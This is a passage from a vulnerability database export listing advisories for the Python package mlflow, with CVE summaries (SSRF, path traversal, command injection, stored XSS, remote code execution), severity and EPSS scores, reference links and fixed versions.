vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-96az-gdtg-aka8
5
vulnerability VCID-9mak-nkua-3uhr
6
vulnerability VCID-axte-ftrh-4bb7
7
vulnerability VCID-fxtg-yezw-hfhr
8
vulnerability VCID-kqsy-qu8j-8ugj
9
vulnerability VCID-scm3-63j1-tkf2
10
vulnerability VCID-tnps-h89q-a7hj
11
vulnerability VCID-wphf-gk61-8ube
12
vulnerability VCID-xdur-8vs8-jfcy
13
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.5.0
aliases CVE-2025-14279, GHSA-pgqp-8h46-6x4j
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7ykf-b93e-w7am
5
url VCID-96az-gdtg-aka8
vulnerability_id VCID-96az-gdtg-aka8
summary A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2393
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.1052
published_at 2026-06-11T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.12212
published_at 2026-06-14T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12229
published_at 2026-06-12T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12234
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2393
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2393
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2393
3
reference_url https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150
reference_id 04ef100d-06b5-4a70-95b1-b7be23aa8150
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:19Z/
url https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150
4
reference_url https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389
reference_id 64aa0ab7207f9c649b59ba1a5f40d82196817389
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:19Z/
url https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389
5
reference_url https://github.com/advisories/GHSA-65h7-c7c4-mghx
reference_id GHSA-65h7-c7c4-mghx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65h7-c7c4-mghx
fixed_packages
0
url pkg:pypi/mlflow@3.9.0
purl pkg:pypi/mlflow@3.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-7ach-q3x2-3uat
4
vulnerability VCID-fxtg-yezw-hfhr
5
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0
aliases CVE-2026-2393, GHSA-65h7-c7c4-mghx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-96az-gdtg-aka8
6
url VCID-97xj-trtn-g7ah
vulnerability_id VCID-97xj-trtn-g7ah
summary gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-52967
reference_id
reference_type
scores
0
value 0.00247
scoring_system epss
scoring_elements 0.48399
published_at 2026-06-13T12:55:00Z
1
value 0.00247
scoring_system epss
scoring_elements 0.48384
published_at 2026-06-14T12:55:00Z
2
value 0.00247
scoring_system epss
scoring_elements 0.48381
published_at 2026-06-12T12:55:00Z
3
value 0.00247
scoring_system epss
scoring_elements 0.48243
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-52967
1
reference_url https://github.com/advisories/GHSA-wxj7-3fx5-pp9m
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wxj7-3fx5-pp9m
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/releases/tag/v2.22.2
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v2.22.2
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2025-52.yaml
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2025-52.yaml
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-52967
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-52967
6
reference_url https://github.com/mlflow/mlflow/issues/15944
reference_id 15944
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/issues/15944
7
reference_url https://github.com/mlflow/mlflow/pull/15970
reference_id 15970
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/pull/15970
8
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.1.0
reference_id v3.1.0
reference_type
scores
0
value 5.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-06-23T20:12:42Z/
url https://github.com/mlflow/mlflow/releases/tag/v3.1.0
fixed_packages
0
url pkg:pypi/mlflow@2.22.2
purl pkg:pypi/mlflow@2.22.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-k79p-ju8g-9bhe
11
vulnerability VCID-kqsy-qu8j-8ugj
12
vulnerability VCID-scm3-63j1-tkf2
13
vulnerability VCID-tnps-h89q-a7hj
14
vulnerability VCID-w5et-zcp1-zfdb
15
vulnerability VCID-wphf-gk61-8ube
16
vulnerability VCID-xdur-8vs8-jfcy
17
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.2
1
url pkg:pypi/mlflow@3.0.0rc0
purl pkg:pypi/mlflow@3.0.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-k79p-ju8g-9bhe
11
vulnerability VCID-kqsy-qu8j-8ugj
12
vulnerability VCID-scm3-63j1-tkf2
13
vulnerability VCID-tnps-h89q-a7hj
14
vulnerability VCID-w5et-zcp1-zfdb
15
vulnerability VCID-wphf-gk61-8ube
16
vulnerability VCID-xdur-8vs8-jfcy
17
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.0.0rc0
2
url pkg:pypi/mlflow@3.1.0
purl pkg:pypi/mlflow@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-9mak-nkua-3uhr
7
vulnerability VCID-axte-ftrh-4bb7
8
vulnerability VCID-fxtg-yezw-hfhr
9
vulnerability VCID-kqsy-qu8j-8ugj
10
vulnerability VCID-scm3-63j1-tkf2
11
vulnerability VCID-tnps-h89q-a7hj
12
vulnerability VCID-w5et-zcp1-zfdb
13
vulnerability VCID-wphf-gk61-8ube
14
vulnerability VCID-xdur-8vs8-jfcy
15
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.1.0
aliases BIT-mlflow-2025-52967, CVE-2025-52967, GHSA-wxj7-3fx5-pp9m, PYSEC-2025-52
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-97xj-trtn-g7ah
7
url VCID-9mak-nkua-3uhr
vulnerability_id VCID-9mak-nkua-3uhr
summary A path traversal vulnerability exists in the `extract_archive_to_dir` function within the `mlflow/pyfunc/dbconnect_artifact_cache.py` file of the mlflow/mlflow repository. This vulnerability, present in versions before v3.7.0, arises due to the lack of validation of tar member paths during extraction. An attacker with control over the tar.gz file can exploit this issue to overwrite arbitrary files or gain elevated privileges, potentially escaping the sandbox directory in multi-tenant or shared cluster environments.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15036.json
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15036.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15036
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13748
published_at 2026-06-14T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13777
published_at 2026-06-13T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.1366
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15036
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15036
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15036
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452925
reference_id 2452925
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452925
5
reference_url https://huntr.com/bounties/36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
reference_id 36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-30T14:01:01Z/
url https://huntr.com/bounties/36c314cf-fd6e-4fb0-b9b0-1b47bcdf0eb0
6
reference_url https://github.com/mlflow/mlflow/commit/3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
reference_id 3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-30T14:01:01Z/
url https://github.com/mlflow/mlflow/commit/3bf6d81ac4d38654c8ff012dbd0c3e9f17e7e346
7
reference_url https://github.com/advisories/GHSA-vhcx-3pq2-4fvc
reference_id GHSA-vhcx-3pq2-4fvc
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vhcx-3pq2-4fvc
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15036, GHSA-vhcx-3pq2-4fvc
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9mak-nkua-3uhr
8
url VCID-axte-ftrh-4bb7
vulnerability_id VCID-axte-ftrh-4bb7
summary A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0596
reference_id
reference_type
scores
0
value 0.00193
scoring_system epss
scoring_elements 0.41277
published_at 2026-06-14T12:55:00Z
1
value 0.00193
scoring_system epss
scoring_elements 0.41099
published_at 2026-06-11T12:55:00Z
2
value 0.00193
scoring_system epss
scoring_elements 0.41286
published_at 2026-06-13T12:55:00Z
3
value 0.00193
scoring_system epss
scoring_elements 0.41265
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0596
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/commit/202fac4c83ccc8544c087c142b80196d0e60695c
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/202fac4c83ccc8544c087c142b80196d0e60695c
3
reference_url https://github.com/mlflow/mlflow/pull/19738
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/19738
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0596
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0596
5
reference_url https://huntr.com/bounties/2e905add-f9f5-4309-a3db-b17de5981285
reference_id 2e905add-f9f5-4309-a3db-b17de5981285
reference_type
scores
0
value 9.6
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T17:19:22Z/
url https://huntr.com/bounties/2e905add-f9f5-4309-a3db-b17de5981285
6
reference_url https://github.com/advisories/GHSA-rvhj-8chj-8v3c
reference_id GHSA-rvhj-8chj-8v3c
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rvhj-8chj-8v3c
fixed_packages
0
url pkg:pypi/mlflow@3.9.0
purl pkg:pypi/mlflow@3.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-7ach-q3x2-3uat
4
vulnerability VCID-fxtg-yezw-hfhr
5
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0
aliases CVE-2026-0596, GHSA-rvhj-8chj-8v3c
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axte-ftrh-4bb7
9
url VCID-fxtg-yezw-hfhr
vulnerability_id VCID-fxtg-yezw-hfhr
summary 
MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. 

This issue affects MLflow version through 3.10.1
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33865.json
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33865.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33865
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01315
published_at 2026-06-11T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01312
published_at 2026-06-12T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01322
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01839
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33865
2
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://cert.pl/en/posts/2026/04/CVE-2026-33865
3
reference_url https://github.com/advisories/GHSA-fh64-r2vc-xvhr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fh64-r2vc-xvhr
4
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
5
reference_url https://github.com/mlflow/mlflow/commit/aca4dd0ec88a12f7655155c224371280e9b45dda
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/aca4dd0ec88a12f7655155c224371280e9b45dda
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-93.yaml
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-93.yaml
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33865
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33865
8
reference_url https://github.com/mlflow/mlflow/pull/21435
reference_id 21435
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://github.com/mlflow/mlflow/pull/21435
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2455899
reference_id 2455899
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2455899
10
reference_url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_id attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
11
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
reference_id CVE-2026-33865
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:13:51Z/
url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
1
url pkg:pypi/mlflow@3.11.1
purl pkg:pypi/mlflow@3.11.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.1
aliases BIT-mlflow-2026-33865, CVE-2026-33865, GHSA-fh64-r2vc-xvhr, PYSEC-2026-93
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fxtg-yezw-hfhr
10
url VCID-k79p-ju8g-9bhe
vulnerability_id VCID-k79p-ju8g-9bhe
summary 
MLflow Tracking Server Model Creation Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of model file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26921.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11201
reference_id
reference_type
scores
0
value 0.17936
scoring_system epss
scoring_elements 0.95314
published_at 2026-06-12T12:55:00Z
1
value 0.17936
scoring_system epss
scoring_elements 0.95321
published_at 2026-06-14T12:55:00Z
2
value 0.17936
scoring_system epss
scoring_elements 0.95319
published_at 2026-06-13T12:55:00Z
3
value 0.17936
scoring_system epss
scoring_elements 0.95299
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11201
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
